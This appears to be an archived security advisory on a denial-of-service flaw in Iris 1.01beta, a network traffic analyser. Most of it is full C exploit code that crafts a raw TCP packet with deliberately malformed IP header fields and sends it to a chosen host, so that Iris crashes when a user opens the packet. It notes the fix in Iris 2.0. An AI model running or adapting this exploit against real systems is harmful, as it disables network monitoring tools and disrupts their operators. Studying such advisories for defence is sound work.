COMMAND
Iris
SYSTEMS AFFECTED
Iris 1.01beta
PROBLEM
Wouter ter Maat aka grazer found following. There exists a
vulnerability that will cause the iris network traffic analyser
to hang. Exploit will demonstrate the bug. The exploit will send
a packet to the remote host, when the remote host opens the packet
(to examine it) iris will quit, leaving an error message.
/* Denial of Service attack against :
* Iris The Network Traffic Analyzer beta 1.01
* ------------------------------------------------
*
* Will create an incorrect packet which will cause
* Iris to hang when it is opened by a user.
*
* Vulnerability found by : grazer@digit-labs.org
* Exploit code by : grazer@digit-labs.org
*
* Respect to the guys from eEye, for there fast
* response.
*
* greetings to hit2000, hwa, synnergy, security.is
* digit-labs.
*
* ---------------> free sk8!!!! <-----------------
*
* ------------------------------------------------
* http://www.digit-labs.org
* grazer@digit-labs.org
* ------------------------------------------------
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <sys/types.h>
#include <sys/socket.h>
int build_packet(int sfd, u_long srcaddr, u_long dstaddr);
struct pseudo {
u_long saddr;
u_long daddr;
u_char zero;
u_char protocol;
u_short length;
};
int main(int argc,char **argv){
int rawfd, check, one=1;
struct sockaddr_in raddr;
struct in_addr source_ip, desti_ip;
struct ip *ip;
struct tcphdr *tcp;
while (argc<3) {
fprintf(stderr, "\n\n[ IRIS DoS attack - by grazer ]");
fprintf(stderr, "\n %s localhost remotehost \n\n", argv[0] ); exit(0);}
fprintf(stderr, "\nStarting Iris DoS...\n");
if((check=gethostbyname(argv[2])==NULL)) {
fprintf(stderr, "\nCannot resolve host %s\n", argv[2]); exit(0); }
source_ip.s_addr= inet_addr(argv[1]);
desti_ip.s_addr = inet_addr(argv[2]);
if ((rawfd=socket(PF_INET, SOCK_RAW, IPPROTO_TCP))<0) {
fprintf(stderr, "\n You need root for this..");
exit(0); }
setsockopt(rawfd, IPPROTO_IP, IP_HDRINCL, &one, 1);
build_packet(rawfd,source_ip.s_addr, desti_ip.s_addr);
close(rawfd);
return 1; }
int build_packet(int sfd, u_long srcaddr, u_long dstaddr) {
u_char packet[sizeof(struct ip) + sizeof(struct pseudo) + sizeof(struct tcphdr)];
struct sockaddr_in sin;
struct in_addr src_inaddr, dest_inaddr;
struct ip *ip = (struct ip *) packet;
struct pseudo *pseudo = (struct pseudo *) (packet + sizeof(struct ip));
struct tcphdr *tcp = (struct tcphdr *) (packet + sizeof(struct ip)
+ sizeof(struct pseudo));
bzero(packet, sizeof(packet));
bzero(&sin,sizeof(sin));
src_inaddr.s_addr = srcaddr;
dest_inaddr.s_addr = dstaddr;
pseudo->saddr = srcaddr;
pseudo->daddr = dstaddr;
pseudo->zero = 1;
pseudo->protocol=IPPROTO_TCP;
pseudo->length = htons(sizeof (struct tcphdr));
ip->ip_v = -1;
ip->ip_hl = -1;
ip->ip_id = -1;
ip->ip_src = src_inaddr;
ip->ip_dst = dest_inaddr;
ip->ip_p = IPPROTO_TCP;
ip->ip_ttl = 40;
ip->ip_off = -1;
ip->ip_len = sizeof(struct ip) + sizeof(struct tcphdr);
tcp->seq = htonl(rand());
tcp->ack = htonl(rand());
sin.sin_family=AF_INET;
sin.sin_addr.s_addr=dstaddr;
sendto(sfd,packet,sizeof(struct ip) + sizeof(struct tcphdr), 0,
(struct sockaddr *) &sin,sizeof(sin));
fprintf(stderr, "\n Packet send... \n\n" );
return 1;}
The one thing to note is that someone has to actually click and
view the "evil" packet in order for Iris to crash. If you simply
open iris and start sniffing and receive the "evil" packet,
without clicking to view it, then Iris will not crash.
SOLUTION
This indeed is a bug in Iris 1.01 beta and it has been fixed
within Iris 2. 0.